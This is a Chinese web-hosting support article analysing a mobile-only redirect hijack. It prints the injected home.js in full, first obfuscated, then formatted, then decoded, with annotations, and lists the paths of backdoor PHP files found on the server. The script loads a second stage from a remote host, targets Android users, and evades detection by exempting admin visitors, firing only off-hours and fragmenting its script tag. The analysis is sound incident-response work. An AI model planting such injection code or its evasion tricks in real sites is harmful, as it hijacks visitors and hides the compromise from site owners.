最近流行的手机站区域性劫持的分析及处理!
分类
服务器租用帮助
阅读3731 次
发布日期 2018-11-01
本次接到的客户遇到的问题是:他的手机站总是跳转到一个垃圾推广网站页面上,电脑端访问则正常,查了好久也没发现问题出在哪儿,就请我来帮忙一起分析并处理一下。
首先我们先用谷歌浏览器模拟手机访问,同时利用抓包工具分析一下他的详细访问及源码,如下:
然后去服务器上查看一下他站点目录内的js有没有最近修改过的痕迹,然后就发现了home.js最近被改动过,如下:
现在我们来解密一下这个home.js文件,还原下看看他的详细操作,如下:
【原加密代码】
// NOTE(analysis): home.js exactly as found on the server, passed through the
// sojson.com obfuscator: a hex-escaped string table (_0x709e) plus index
// lookups, so none of the plain words "cookie", "write" or the remote host
// appear in the file as written. The formatted and decoded listings further
// down are this same file; their comments explain what each branch does.
var __encode ='sojson.com', _0xb483=["\x5F\x64\x65\x63\x6F\x64\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];(function(_0xd642x1){_0xd642x1[_0xb483[0]]= _0xb483[1]})(window);var _0x709e=["\x67\x65\x74\x48\x6F\x75\x72\x73","\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x3A","\x73\x70\x6C\x69\x74","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x73","\x68","\x64","\x28\x5E\x7C\x20\x29","\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29\x28\x3B\x7C\x24\x29","\x6D\x61\x74\x63\x68","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x61\x70\x70\x56\x65\x72\x73\x69\x6F\x6E","\x61\x6E\x64\x72\x6F\x69\x64","\x69\x6E\x64\x65\x78\x4F\x66","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x69\x50\x68\x6F\x6E\x65","\x69\x50\x61\x64","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x61\x6E\x7A\x68\x61\x6E\x77\x61\x70","\x68\x36","\x30\x3A\x30\x30","\x38\x3A\x33\x30","\x31\x35\x3A\x30\x30","\x32\x33\x3A\x35\x39","\x61\x6A\x61\x78","\x3C\x73\x63\x72\x69\x70\x74","\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x77\x77\x77\x2E\x62\x6E\x67\x72\x68\x6B\x2E\x63\x6F\x6D\x2F","\x31\x2E\x6A\x73\x22\x3E\x3C","\x2F\x73\x63\x72\x69\x70","\x74\x3E","\x77\x72\x69\x74\x65","\x31","\x31\x3A\x33\x30","\x36\x3A\x35\x39","\x64\x32\x34"];function checkTime(_0xf217x2){var _0xf217x3= new Date();var _0xf217x4=parseInt(_0xf217x3[_0x709e[0]]())* 60+ parseInt(_0xf217x3[_0x709e[1]]());var _0xf217x5=_0xf217x2[0][_0x709e[3]](_0x709e[2]);var _0xf217x6=_0xf217x2[1][_0x709e[3]](_0x709e[2]);var 
_0xf217x7=parseInt(_0xf217x5[0])* 60+ parseInt(_0xf217x5[1]);var _0xf217x8=parseInt(_0xf217x6[0])* 60+ parseInt(_0xf217x6[1]);if(_0xf217x4>= _0xf217x7&& _0xf217x4<= _0xf217x8){return true}else {return false}}function randomNum(_0xf217xa,_0xf217xb){switch(arguments[_0x709e[5]]){case 1:return parseInt(Math[_0x709e[4]]()* _0xf217xa+ 1,10);break;case 2:return parseInt(Math[_0x709e[4]]()* (_0xf217xb- _0xf217xa+ 1)+ _0xf217xa,10);break;default:return 0;break}}function setCookie(_0xf217xd,_0xf217xe,_0xf217xf){var _0xf217x10=getsec(_0xf217xf);var _0xf217x11= new Date();_0xf217x11[_0x709e[7]](_0xf217x11[_0x709e[6]]()+ _0xf217x10* 1);document[_0x709e[8]]= _0xf217xd+ _0x709e[9]+ escape(_0xf217xe)+ _0x709e[10]+ _0xf217x11[_0x709e[11]]()}function getsec(_0xf217x13){var _0xf217x14=_0xf217x13[_0x709e[12]](1,_0xf217x13[_0x709e[5]])* 1;var _0xf217x15=_0xf217x13[_0x709e[12]](0,1);if(_0xf217x15== _0x709e[13]){return _0xf217x14* 1000}else {if(_0xf217x15== _0x709e[14]){return _0xf217x14* 60* 60* 1000}else {if(_0xf217x15== _0x709e[15]){return _0xf217x14* 24* 60* 60* 1000}}}}function getCookie(_0xf217xd){var _0xf217x17,_0xf217x18= new RegExp(_0x709e[16]+ _0xf217xd+ _0x709e[17]);if(_0xf217x17= document[_0x709e[8]][_0x709e[18]](_0xf217x18)){return unescape(_0xf217x17[2])}else {return null}}var browser={versions:function(){var _0xf217x1a=navigator[_0x709e[19]],_0xf217x1b=navigator[_0x709e[20]];return {android:_0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21])> -1,iPhone:_0xf217x1a[_0x709e[22]](_0x709e[24])> -1,iPad:_0xf217x1a[_0x709e[22]](_0x709e[25])> -1}}()};var xxx=randomNum(1,2);var isadmin=(window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i)!= null;if(!isadmin){var isiPad=navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i)!= null;if(isiPad){if(getCookie(_0x709e[28])){var hanzhanwap=parseInt(getCookie(_0x709e[28]))+ 1;setCookie(_0x709e[28],hanzhanwap,_0x709e[29]);if(parseInt(getCookie(_0x709e[28]))<= 6){if(checkTime([_0x709e[30],_0x709e[31]])|| 
checkTime([_0x709e[32],_0x709e[33]])){if(xxx== 1){$[_0x709e[34]]= 1;document[_0x709e[40]](_0x709e[35]+ _0x709e[36]+ _0x709e[37]+ _0x709e[38]+ _0x709e[39])}}}}else {setCookie(_0x709e[28],_0x709e[41],_0x709e[29]);if(checkTime([_0x709e[42],_0x709e[43]])){if(xxx== 1){document[_0x709e[40]](_0x709e[35]+ _0x709e[36]+ _0x709e[37]+ _0x709e[38]+ _0x709e[39])}}}}}else {setCookie(_0x709e[28],888,_0x709e[44])}
【格式化后】
// NOTE(analysis): pretty-printed but still hex-escaped version of the injected
// home.js. The first statement and the IIFE are boilerplate emitted by the
// sojson.com obfuscator (they only set window._decode to the obfuscator's URL);
// they carry no payload but are a handy fingerprint when searching other files
// on the host for the same tooling.
var __encode = 'sojson.com',
_0xb483 = ["\x5F\x64\x65\x63\x6F\x64\x65", "\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];
(function(_0xd642x1) {
_0xd642x1[_0xb483[0]] = _0xb483[1]
})(window);
// String table. Every property name and literal used below is fetched from
// this array by index, so a plain-text grep for "cookie", "write" or the remote
// host finds nothing. The escapes decode to the plain strings shown in the
// "解密后代码" listing; the indices worth remembering are [28] "hanzhanwap"
// (tracking cookie), [34] "ajax", [35]-[39] (pieces of the <script> tag that
// loads //www.bngrhk.com/1.js), [40] "write", [29]/[44] "h6"/"d24" (cookie
// lifetimes) and [30]-[33]/[42]-[43] (local-time windows).
var _0x709e = ["\x67\x65\x74\x48\x6F\x75\x72\x73", "\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73", "\x3A", "\x73\x70\x6C\x69\x74", "\x72\x61\x6E\x64\x6F\x6D", "\x6C\x65\x6E\x67\x74\x68", "\x67\x65\x74\x54\x69\x6D\x65", "\x73\x65\x74\x54\x69\x6D\x65", "\x63\x6F\x6F\x6B\x69\x65", "\x3D", "\x3B\x65\x78\x70\x69\x72\x65\x73\x3D", "\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67", "\x73", "\x68", "\x64", "\x28\x5E\x7C\x20\x29", "\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29\x28\x3B\x7C\x24\x29", "\x6D\x61\x74\x63\x68", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x61\x70\x70\x56\x65\x72\x73\x69\x6F\x6E", "\x61\x6E\x64\x72\x6F\x69\x64", "\x69\x6E\x64\x65\x78\x4F\x66", "\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65", "\x69\x50\x68\x6F\x6E\x65", "\x69\x50\x61\x64", "\x68\x72\x65\x66", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x61\x6E\x7A\x68\x61\x6E\x77\x61\x70", "\x68\x36", "\x30\x3A\x30\x30", "\x38\x3A\x33\x30", "\x31\x35\x3A\x30\x30", "\x32\x33\x3A\x35\x39", "\x61\x6A\x61\x78", "\x3C\x73\x63\x72\x69\x70\x74", "\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x77\x77\x77\x2E\x62\x6E\x67\x72\x68\x6B\x2E\x63\x6F\x6D\x2F", "\x31\x2E\x6A\x73\x22\x3E\x3C", "\x2F\x73\x63\x72\x69\x70", "\x74\x3E", "\x77\x72\x69\x74\x65", "\x31", "\x31\x3A\x33\x30", "\x36\x3A\x35\x39", "\x64\x32\x34"];
/**
 * Reports whether the visitor's current local time of day lies inside an
 * inclusive window.
 * @param {string[]} _0xf217x2 - two "H:MM" strings, [start, end]
 * @returns {boolean}
 * _0x709e[0]/[1] are "getHours"/"getMinutes", [3] is "split", [2] is ":";
 * both sides are reduced to minutes since midnight before comparing. The
 * browser's local clock is used, so whether the payload fires depends on the
 * viewer's time zone and the hour of the test — one reason it can be hard to
 * reproduce on demand. parseInt() is called without a radix; harmless for the
 * "0:00"-style literals used in this file.
 */
function checkTime(_0xf217x2) {
var _0xf217x3 = new Date();
// now, as minutes since local midnight
var _0xf217x4 = parseInt(_0xf217x3[_0x709e[0]]()) * 60 + parseInt(_0xf217x3[_0x709e[1]]());
// window start / end, split on ":"
var _0xf217x5 = _0xf217x2[0][_0x709e[3]](_0x709e[2]);
var _0xf217x6 = _0xf217x2[1][_0x709e[3]](_0x709e[2]);
var _0xf217x7 = parseInt(_0xf217x5[0]) * 60 + parseInt(_0xf217x5[1]);
var _0xf217x8 = parseInt(_0xf217x6[0]) * 60 + parseInt(_0xf217x6[1]);
if (_0xf217x4 >= _0xf217x7 && _0xf217x4 <= _0xf217x8) {
return true
} else {
return false
}
}
/**
 * Random-integer helper whose behaviour is selected by arguments.length
 * (_0x709e[5] is "length", [4] is "random"):
 *   randomNum(n)    -> integer in [1, n]
 *   randomNum(a, b) -> integer in [a, b]
 *   any other arity -> 0
 * The `break` after each `return` is dead code. Used once below as
 * randomNum(1, 2): a coin flip that limits the injection to roughly half of
 * the page loads that pass every other check.
 */
function randomNum(_0xf217xa, _0xf217xb) {
switch (arguments[_0x709e[5]]) {
case 1:
return parseInt(Math[_0x709e[4]]() * _0xf217xa + 1, 10);
break;
case 2:
return parseInt(Math[_0x709e[4]]() * (_0xf217xb - _0xf217xa + 1) + _0xf217xa, 10);
break;
default:
return 0;
break
}
}
/**
 * Writes `name=escape(value);expires=<now + lifetime>` to document.cookie.
 * @param {string} _0xf217xd - cookie name
 * @param {*} _0xf217xe - value, passed through escape()
 * @param {string} _0xf217xf - lifetime spec understood by getsec(); this file
 *   uses "h6" (6 hours) and "d24" (24 days)
 * _0x709e[6]..[11] are "getTime", "setTime", "cookie", "=", ";expires=",
 * "toGMTString". No path/domain/secure/SameSite attributes are written. If
 * getsec() returns undefined (unknown unit letter) the arithmetic yields NaN
 * and the expires value is invalid — presumably ignored by the browser; not
 * reachable with the three specs used below.
 */
function setCookie(_0xf217xd, _0xf217xe, _0xf217xf) {
var _0xf217x10 = getsec(_0xf217xf); // lifetime in milliseconds
var _0xf217x11 = new Date();
_0xf217x11[_0x709e[7]](_0xf217x11[_0x709e[6]]() + _0xf217x10 * 1); // now + lifetime
document[_0x709e[8]] = _0xf217xd + _0x709e[9] + escape(_0xf217xe) + _0x709e[10] + _0xf217x11[_0x709e[11]]()
}
/**
 * Converts a lifetime spec such as "h6" or "d24" into milliseconds.
 * The first character is the unit — "s" seconds, "h" hours, "d" days
 * (_0x709e[13]/[14]/[15]) — and the rest is the count (substring(1) * 1;
 * [12] is "substring", [5] "length").
 * @param {string} _0xf217x13
 * @returns {number|undefined} undefined for any other unit letter, since
 *   there is no final else
 */
function getsec(_0xf217x13) {
var _0xf217x14 = _0xf217x13[_0x709e[12]](1, _0xf217x13[_0x709e[5]]) * 1; // numeric count
var _0xf217x15 = _0xf217x13[_0x709e[12]](0, 1); // unit letter
if (_0xf217x15 == _0x709e[13]) {
return _0xf217x14 * 1000
} else {
if (_0xf217x15 == _0x709e[14]) {
return _0xf217x14 * 60 * 60 * 1000
} else {
if (_0xf217x15 == _0x709e[15]) {
return _0xf217x14 * 24 * 60 * 60 * 1000
}
}
}
}
/**
 * Reads a single cookie value out of document.cookie.
 * @param {string} _0xf217xd - cookie name; it is interpolated into a RegExp
 *   unescaped, which is fine for the fixed name used in this file
 * @returns {string|null} the unescape()d value, or null when the cookie is absent
 * The pattern is "(^| )" + name + "=([^;]*)(;|$)" (_0x709e[16]/[17]); [8] is
 * "cookie", [18] is "match". The assignment inside the `if` is deliberate: it
 * captures the match array so that group 2 (the value) can be returned.
 */
function getCookie(_0xf217xd) {
var _0xf217x17, _0xf217x18 = new RegExp(_0x709e[16] + _0xf217xd + _0x709e[17]);
if (_0xf217x17 = document[_0x709e[8]][_0x709e[18]](_0xf217x18)) {
return unescape(_0xf217x17[2])
} else {
return null
}
}
// NOTE(analysis): `browser.versions` is computed once (IIFE) but never read
// anywhere else in this file — leftover or decoy. It only inspects
// navigator.userAgent ([19]) / appVersion ([20]) for "android"/"iPhone"/"iPad".
var browser = {
versions: function() {
var _0xf217x1a = navigator[_0x709e[19]],
_0xf217x1b = navigator[_0x709e[20]]; // read but unused
return {
android: _0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21]) > -1,
iPhone: _0xf217x1a[_0x709e[22]](_0x709e[24]) > -1,
iPad: _0xf217x1a[_0x709e[22]](_0x709e[25]) > -1
}
}()
};
// Coin flip for this page load (1 or 2). Every injection below is also gated
// on xxx == 1, so at most about half of the qualifying loads are hit.
var xxx = randomNum(1, 2);
// Any URL containing "admin" (window.location.href, [27]/[26]) is exempt, so
// the site owner working in the backend does not trigger the payload.
var isadmin = (window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i) != null;
if (!isadmin) {
// Only Android/Linux user agents are targeted ("isiPad" is a misnomer);
// desktop browsers get nothing, which matches the "PC is fine, phone
// redirects" report at the top of this article.
var isiPad = navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i) != null;
if (isiPad) {
// Returning visitor: the "hanzhanwap" ([28]) counter cookie already exists.
if (getCookie(_0x709e[28])) {
// Bump the per-browser hit counter and refresh it for another 6 hours ("h6").
var hanzhanwap = parseInt(getCookie(_0x709e[28])) + 1;
setCookie(_0x709e[28], hanzhanwap, _0x709e[29]);
// Stop after the 6th hit — presumably to keep any single visitor from
// being redirected often enough to complain.
if (parseInt(getCookie(_0x709e[28])) <= 6) {
// Only between 00:00-08:30 or 15:00-23:59 local time ([30]-[33]).
if (checkTime([_0x709e[30], _0x709e[31]]) || checkTime([_0x709e[32], _0x709e[33]])) {
if (xxx == 1) {
// $.ajax = 1 — overwrites jQuery's ajax() on this page. The reason is not
// evident from this file; possibly to stop the site's own requests from
// interfering with the loaded stage — confirm.
$[_0x709e[34]] = 1;
// Second stage: document.write('<script language="javascript"
// type="text/javascript" src="//www.bngrhk.com/1.js"></script>'). The tag is
// assembled from five fragments ("</scrip" + "t>"), presumably to defeat simple
// string matching. Nothing in home.js itself touches location, so the redirect
// the customer saw must come from that remote script.
document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
}
}
}
} else {
// First visit: start the counter at "1" ([41]) for 6 hours, and inject only
// in the 01:30-06:59 local-time window ([42]/[43]) — off-hours, presumably
// when the operator is least likely to be looking.
setCookie(_0x709e[28], _0x709e[41], _0x709e[29]);
if (checkTime([_0x709e[42], _0x709e[43]])) {
if (xxx == 1) {
document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
}
}
}
}
} else {
// Admin URL: set the counter to 888 for 24 days ("d24"). Because 888 > 6,
// that browser fails the `<= 6` check on every later visit, so whoever
// administers the site from it never sees the injection — likely why checks
// from the operator's own device came up clean.
setCookie(_0x709e[28], 888, _0x709e[44])
}
【解密后代码】
// NOTE(analysis): the injected home.js with the hex escapes decoded. Indicators
// from this file for IR: the modified home.js itself, the cookie name
// "hanzhanwap", and the remote host www.bngrhk.com (1.js). The first statement
// and the IIFE are sojson.com obfuscator boilerplate (they only set
// window._decode to the obfuscator's URL).
var __encode = 'sojson.com',
_0xb483 = ["_decode", "http://www.sojson.com/javascriptobfuscator.html"];
(function(_0xd642x1) {
_0xd642x1[_0xb483[0]] = _0xb483[1]
})(window);
// String table; every property name and literal below is looked up here by
// index. Indices to remember: [28] "hanzhanwap" (tracking cookie), [34]
// "ajax", [35]-[39] the fragments of the <script> tag that loads
// //www.bngrhk.com/1.js (note "</scrip" + "t>"), [40] "write", [29]/[44]
// "h6"/"d24" (cookie lifetimes), [30]-[33] and [42]-[43] (local-time windows).
var _0x709e = ["getHours", "getMinutes", ":", "split", "random", "length", "getTime", "setTime", "cookie", "=", ";expires=", "toGMTString", "substring", "s", "h", "d", "(^| )", "=([^;]*)(;|$)", "match", "userAgent", "appVersion", "android", "indexOf", "toLowerCase", "iPhone", "iPad", "href", "location", "hanzhanwap", "h6", "0:00", "8:30", "15:00", "23:59", "ajax", "<script", " language="javascript" type="text/javascript" src="//www.bngrhk.com/", "1.js"><", "/scrip", "t>", "write", "1", "1:30", "6:59", "d24"];
/**
 * True when the visitor's current local time of day is inside an inclusive
 * [start, end] window.
 * @param {string[]} _0xf217x2 - two "H:MM" strings, e.g. ["0:00", "8:30"]
 * @returns {boolean}
 * Both "now" and the bounds are converted to minutes since midnight. The
 * comparison runs against the browser's local clock, so the outcome depends
 * on the viewer's time zone and on when the page is tested — the payload is
 * invisible outside the windows. parseInt() has no radix argument; harmless
 * for the fixed literals used here.
 */
function checkTime(_0xf217x2) {
var _0xf217x3 = new Date();
// now, in minutes since local midnight (getHours / getMinutes)
var _0xf217x4 = parseInt(_0xf217x3[_0x709e[0]]()) * 60 + parseInt(_0xf217x3[_0x709e[1]]());
// split start and end on ":"
var _0xf217x5 = _0xf217x2[0][_0x709e[3]](_0x709e[2]);
var _0xf217x6 = _0xf217x2[1][_0x709e[3]](_0x709e[2]);
var _0xf217x7 = parseInt(_0xf217x5[0]) * 60 + parseInt(_0xf217x5[1]);
var _0xf217x8 = parseInt(_0xf217x6[0]) * 60 + parseInt(_0xf217x6[1]);
if (_0xf217x4 >= _0xf217x7 && _0xf217x4 <= _0xf217x8) {
return true
} else {
return false
}
}
/**
 * Random integer helper dispatched on arguments.length:
 *   one argument n   -> integer in [1, n]
 *   two arguments a,b -> integer in [a, b]
 *   otherwise        -> 0
 * Each `break` after a `return` is unreachable. The only call in this file is
 * randomNum(1, 2), used as a 50/50 gate so the injection does not happen on
 * every qualifying page load.
 */
function randomNum(_0xf217xa, _0xf217xb) {
switch (arguments[_0x709e[5]]) {
case 1:
return parseInt(Math[_0x709e[4]]() * _0xf217xa + 1, 10);
break;
case 2:
return parseInt(Math[_0x709e[4]]() * (_0xf217xb - _0xf217xa + 1) + _0xf217xa, 10);
break;
default:
return 0;
break
}
}
/**
 * Sets `name=escape(value);expires=<now + lifetime>` on document.cookie.
 * @param {string} _0xf217xd - cookie name ("hanzhanwap" in this file)
 * @param {*} _0xf217xe - value, run through escape()
 * @param {string} _0xf217xf - lifetime spec for getsec(): "h6" = 6 hours,
 *   "d24" = 24 days
 * Only name, value and expires are written — no path, domain, secure or
 * SameSite attributes. An unknown unit letter makes getsec() return undefined,
 * which turns the expiry into NaN / an invalid date; not reachable with the
 * specs used below.
 */
function setCookie(_0xf217xd, _0xf217xe, _0xf217xf) {
var _0xf217x10 = getsec(_0xf217xf); // milliseconds
var _0xf217x11 = new Date();
_0xf217x11[_0x709e[7]](_0xf217x11[_0x709e[6]]() + _0xf217x10 * 1); // setTime(getTime() + lifetime)
document[_0x709e[8]] = _0xf217xd + _0x709e[9] + escape(_0xf217xe) + _0x709e[10] + _0xf217x11[_0x709e[11]]()
}
/**
 * Parses a lifetime spec ("s30", "h6", "d24") into milliseconds.
 * The leading character is the unit — "s" seconds, "h" hours, "d" days —
 * and substring(1) * 1 is the count.
 * @param {string} _0xf217x13
 * @returns {number|undefined} undefined for any other leading character, as
 *   there is no final else branch
 */
function getsec(_0xf217x13) {
var _0xf217x14 = _0xf217x13[_0x709e[12]](1, _0xf217x13[_0x709e[5]]) * 1; // count
var _0xf217x15 = _0xf217x13[_0x709e[12]](0, 1); // unit
if (_0xf217x15 == _0x709e[13]) {
return _0xf217x14 * 1000
} else {
if (_0xf217x15 == _0x709e[14]) {
return _0xf217x14 * 60 * 60 * 1000
} else {
if (_0xf217x15 == _0x709e[15]) {
return _0xf217x14 * 24 * 60 * 60 * 1000
}
}
}
}
/**
 * Returns the unescape()d value of cookie `_0xf217xd`, or null if it is not
 * present in document.cookie.
 * @param {string} _0xf217xd - cookie name; inserted into the RegExp source
 *   without escaping (fine for the fixed name this file uses)
 * @returns {string|null}
 * Pattern: "(^| )" + name + "=([^;]*)(;|$)". The assignment in the `if`
 * condition is intentional — it keeps the match array so group 2 can be
 * returned.
 */
function getCookie(_0xf217xd) {
var _0xf217x17, _0xf217x18 = new RegExp(_0x709e[16] + _0xf217xd + _0x709e[17]);
if (_0xf217x17 = document[_0x709e[8]][_0x709e[18]](_0xf217x18)) {
return unescape(_0xf217x17[2])
} else {
return null
}
}
// NOTE(analysis): `browser.versions` is evaluated immediately but nothing in
// this file reads it afterwards — dead code or a decoy. It only tests
// navigator.userAgent for "android" / "iPhone" / "iPad"; appVersion is read and
// then ignored.
var browser = {
versions: function() {
var _0xf217x1a = navigator[_0x709e[19]],
_0xf217x1b = navigator[_0x709e[20]]; // unused
return {
android: _0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21]) > -1,
iPhone: _0xf217x1a[_0x709e[22]](_0x709e[24]) > -1,
iPad: _0xf217x1a[_0x709e[22]](_0x709e[25]) > -1
}
}()
};
// 1 or 2, drawn once per page load; both injection sites below also require
// xxx == 1, so the payload fires on about half of the qualifying loads.
var xxx = randomNum(1, 2);
// URLs containing "admin" (location.href) are exempt: the operator working in
// the backend never triggers the payload from there.
var isadmin = (window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i) != null;
if (!isadmin) {
// Targets Android / Linux user agents only (the name "isiPad" is misleading).
// Desktop browsers are untouched, which is why the site looked fine from a PC.
var isiPad = navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i) != null;
if (isiPad) {
// Returning visitor: the "hanzhanwap" counter cookie exists.
if (getCookie(_0x709e[28])) {
// Increment the per-browser hit counter and extend it by 6 hours ("h6").
var hanzhanwap = parseInt(getCookie(_0x709e[28])) + 1;
setCookie(_0x709e[28], hanzhanwap, _0x709e[29]);
// Give up after the 6th hit — presumably rate-limiting so no single visitor
// is redirected often enough to report it.
if (parseInt(getCookie(_0x709e[28])) <= 6) {
// Only between 00:00-08:30 or 15:00-23:59 local time.
if (checkTime([_0x709e[30], _0x709e[31]]) || checkTime([_0x709e[32], _0x709e[33]])) {
if (xxx == 1) {
// $.ajax = 1: clobbers jQuery's ajax() on the page. Purpose is not evident
// from this file (maybe to keep the site's own XHR from interfering with the
// loaded stage) — confirm against 1.js.
$[_0x709e[34]] = 1;
// Second stage: writes
//   <script language="javascript" type="text/javascript" src="//www.bngrhk.com/1.js"></script>
// into the document. The protocol-relative src works on http and https alike.
// home.js never assigns to location itself, so the redirect to the spam page
// has to come from that remote script.
document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
}
}
}
} else {
// First visit: create the counter at "1" with a 6-hour lifetime and inject
// only during 01:30-06:59 local time — off-hours, presumably chosen so the
// operator is unlikely to be watching.
setCookie(_0x709e[28], _0x709e[41], _0x709e[29]);
if (checkTime([_0x709e[42], _0x709e[43]])) {
if (xxx == 1) {
document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
}
}
}
}
} else {
// Admin URL: park the counter at 888 for 24 days ("d24"). Since 888 > 6, the
// `<= 6` branch above is dead for that browser from then on, so anyone who
// has opened the backend from it will not see the injection on the public
// site either — likely why the owner's own checks found nothing.
setCookie(_0x709e[28], 888, _0x709e[44])
}
看来这位黑客藏得还不够深,一下就被我找到了,哈哈。于是我们又全面检查了一遍网站文件和相关日志,终于找到了根本原因:网站内被放了几个后门木马,如下:
\home\wwwroot\m.*.net\Lib232\Home\Common\config.php
\home\wwwroot\www.*.net\Libbeifen\ThinkPHP\Library\Vendor\Boris\config(1).php
\home\wwwroot\www.*.net\Lib232323\ThinkPHP\Mode\Api\ray.php
好了,现在我们再一次抓到了这个小黑客并给客户做好了驱动级防御成功交差,现在可以继续进行下一位客户问题的分析和处理了!